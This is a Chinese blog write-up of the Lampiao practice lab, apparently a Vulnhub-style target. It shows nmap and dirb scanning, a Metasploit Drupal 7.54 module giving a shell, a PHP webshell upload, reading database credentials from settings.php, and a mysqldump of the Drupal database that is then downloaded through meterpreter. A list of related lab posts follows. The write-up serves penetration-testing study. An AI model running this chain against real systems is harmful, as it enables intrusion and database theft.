靶场实战——Lampiao

已于 2024-09-03 17:29:05 修改
阅读量909 收藏 21
点赞数 26
分类专栏: 渗透测试 安全 文章标签: 服务器 linux 网络 web安全 安全
于 2024-09-03 17:27:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58666006/article/details/141863226
版权

一、目的

        实现对数据库的拖库。

二、环境准备

1、攻击机kali(NAT模式)

2、Navicat

3、靶场Lampiao(NAT模式)

三、操作

1、信息收集

(1)使用nmap扫描网段内的所有ip地址

(2)扫描系统版本和端口开放情况

为了进一步确认,进行系统版本扫描 ,顺便进行端口扫描

观察发现,开放了ssh端口、http的80端口、以及比较特殊的1898端口。但是没有开放mysql的3306端口。

(3)浏览器访问80端口

应该是没啥作用。分析1898端口以及"Cymtec-port" ,可能是一个自定义设置的端口,用于实现类似的重定向或代理功能。

访问1898端口:

成功访问。

2、扫描网站目录及漏洞

(1)使用dirb扫描

(2)使用AWSV扫描

3、msfconsole 

(1)分析漏洞并运用

        通过"Current Drupal version: 7.54"可以得知目标网站Drupal 框架版本为7.54,于 2017 年 8 月 2 日发布。

        在msfconsole中搜索该模块,,命令:

search Drupal

use 1

show options

set rhosts 目标主机ip

set rport 1898

run

getuid

成功获取Lampiao主机的getshell

 (2)上传一句话木马

命令:

upload /root/muma_make/shell.php

(3)蚁剑连接

利用蚁剑的虚拟终端功能来操作目标主机(此时目标主机权限还是有限制的)

 4、数据库拖库

1、查看端口情况

        命令:

netstat -antp

2、本机拖库

(1)查找mysql启动文件

        命令:

whereis mysql

ls | grep mysql

./mysql

(2)寻找mysql用户名和密码

        第一步:由于Lampiao网站使用的是Drupal框架,搜索得知该框架的配置文件名为settings.php

        命令:

find / -name settings.php 2>/dev/null

cat /var/www/html/sites/default/settings.php

寻找mysql配置

(3) 本机登录mysql

        命令:

./mysql -udrupaluser -pVirgulino

show database;

既然可以成功登录,那么可以尝试使用登录携带命令一起执行的操作来获取数据名称

mysql -udrupaluser -pVirgulino -e "show databases;"

结果:

Database
information_schema
drupal

(4)拖库

        命令:

mysqldump -udrupaluser -pVirgulino --database drupal>drupal3.sql

#利用mysqldump执行文件将名为drupal的数据库导出,导出的文件名为drupal.sql

在/var/www/html 目录下执行

/usr/bin/mysqldump -udrupaluser -pVirgulino --database drupal>drupal_test.sql

利用meterpreter模块下载文件:drupal_test.sql

download /var/www/html/drupal_test.sql

成功下载,拖库成功。

Sun@happy
关注
专栏目录
靶场练习之Lampiao
qq_52360932的博客
02-28 6108
Lampiao靶场练习
Vulnhub靶场实战———DC1
m0_67309561的博客
05-01 271
Vuln靶场实战
Lampiao靶场渗透】
最新发布
一纸荒芜的博客
07-30 454
Lampiao靶场渗透
Lampiao靶场
b1n的博客
08-26 179
(2)后面是yes的是我们需要填的,这里只需要填写rhosts和rport,填写完后查看没问题直接run启动,可以看到成功连接靶机。2、百度网盘链接:https://pan.baidu.com/s/1bf46UgmyXKoussgLFW_-jg?-O2 编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高。(4)进入的是一个伪终端,因此还要将其转换为真终端,执行下面的命令就将其变成了真终端。-T4:指定扫描过程中使用的时序(分为0-5等级,推荐用4)
lampiao靶场
orchid_sea的博客
10-21 777
lampiao靶场
vulnhub靶场lampiao
向阳-Y.的博客
02-28 4381
目录1.信息收集2.尝试爆破ssh登录【失败】3.尝试访问网站3.1扫描目录【失败】4.网站系统漏洞【get】5.提权阶段 1.信息收集 首先查看本机网卡网段并来一波存活主机探查,经过排除,锁定了192.168.86.132为靶机 nmap -sP 192.168.86.0/24 接着再对靶机进行一波端口扫描,扫描后的结果如下 nmap -sN -sV -p 1-65535 192.168.86.132 2.尝试爆破ssh登录【失败】 首先使用msfconsole进行ssh登录爆破一波 msfcon
Lampiao
weixin_43841336的博客
04-15 726
方法一: 1.nmap扫描存活主机并确认靶机,我的是153 2.扫描开放端口 3.先访问1898端口,发现是个网站 4.用nikto扫描一下网站用那些目录或文件 访问UPGRADE.txt,提示升级drupal的信息 Drupal7有一个远程执行漏洞 5.用msfconsole工具进行攻击 1.搜索模块 2.使用模块 3.查看并设置选项 6.攻击 6.得到shell 在meterp...
PHP漏洞挖掘(四):PHP漏洞靶场实战分析——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(四):PHP漏洞靶场实战分析——课程资源百度网盘下载,,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
Vulnhub靶场实战———DC2
m0_67309561的博客
05-02 387
Vulnhub靶场实战
lampiao-开源
05-03
Lampiao是一种具有两个模块的软件:代理和服务器。 代理获取硬件/软件/网络信息,并将简历发送到服务器
零基础打靶—Lampiao
qq_61861243的博客
08-28 616
1.确定目标:在所有的靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,其他实战中确定目标的方式包括nmap进行扫描,但不局限于这个nmap。2.常见的信息收集:比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这次训练靶场中比如信息收集包括查看源码,使用工具dirb等3.发现漏洞:之前你们看到那些理论比如sql注入,文件上传等,或者找到相关的系统信息,去网上找相关的exp这些都是为了拿到webshell4.利用漏洞就是使用漏洞拿到webshell。
渗透LAMPIÃO: 1靶场
weixin_51421083的博客
06-30 568
这里有一些描述,可以阅读一下,简单了解一下这个靶场的信息:下载完成后会得到如下图的压缩文件,解压文件。
OSCP系列靶场-Esay-Lampiao
杳若的博客
08-09 1147
OSCP系列靶场-Esay-Lampiao
lampiao靶场---脏牛提权
m0_66908617的博客
05-11 488
渗透测试前期准备攻击机:192.168.71.235(kali系统)靶机:192.168.71.191漏洞复现。
lampiao靶场入侵检测
kunkun_xiaomeng的博客
09-10 1018
lampiao初体验
靶机:Lampiao
AzVoidSUN的博客
07-06 775
下载地址 https://www.vulnhub.com/entry/lampiao-1,249/ 选择NAT模式或桥接模式都可以 目标 得到root权限 信息收集 kali的ip是192.168.174.129 扫下c段 发现靶机ip 192.168.174.4 开启了 22 80端口 进入80端口看下 然后查看页面源代码 没有发现东西 dirb扫下目录 发现扫不到东西 ...
lampiao靶机安装
07-27
为了安装Lampiao靶机,您可以按照以下步骤进行操作: 1. 首先,您需要准备一个基于Linux的操作系统,比如Ubuntu或者Kali Linux。 2. 在您选择的操作系统上安装Apache服务器、MySQL数据库和PHP解释器,这就是所谓的LAMP堆栈。 - 对于Ubuntu,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mysql-server php libapache2-mod-php php-mysql ``` - 对于Kali Linux,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mariadb-server php libapache2-mod-php php-mysql ``` 3. 安装完成后,您需要下载Lampiao靶机的源代码。您可以在Lampiao的GitHub存储库上找到源代码:https://github.com/felipefacundes/lampiao 4. 解压下载的源代码包,并将其复制到Apache服务器的网页根目录下,默认情况下是`/var/www/html/`。 5. 接下来,您需要创建一个MySQL数据库并导入Lampiao的数据。进入MySQL命令行界面并执行以下命令: - 创建数据库: ``` CREATE DATABASE lampiao; ``` - 导入数据: ``` USE lampiao; SOURCE /path/to/lampiao.sql; ``` 将`/path/to/lampiao.sql`替换为实际的lampiao.sql文件路径。 6. 配置Lampiao的数据库连接。编辑Lampiao源代码中的`config.php`文件,并根据您的MySQL配置进行相应的更改。 7. 最后,启动Apache服务器并访问Lampiao靶机。在浏览器中输入服务器的IP地址或域名,您应该能够看到Lampiao的登录页面。 请注意,Lampiao是一个漏洞靶场,仅供学习和研究目的使用。在安装和使用Lampiao时,请确保您遵守当地法律和道德准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值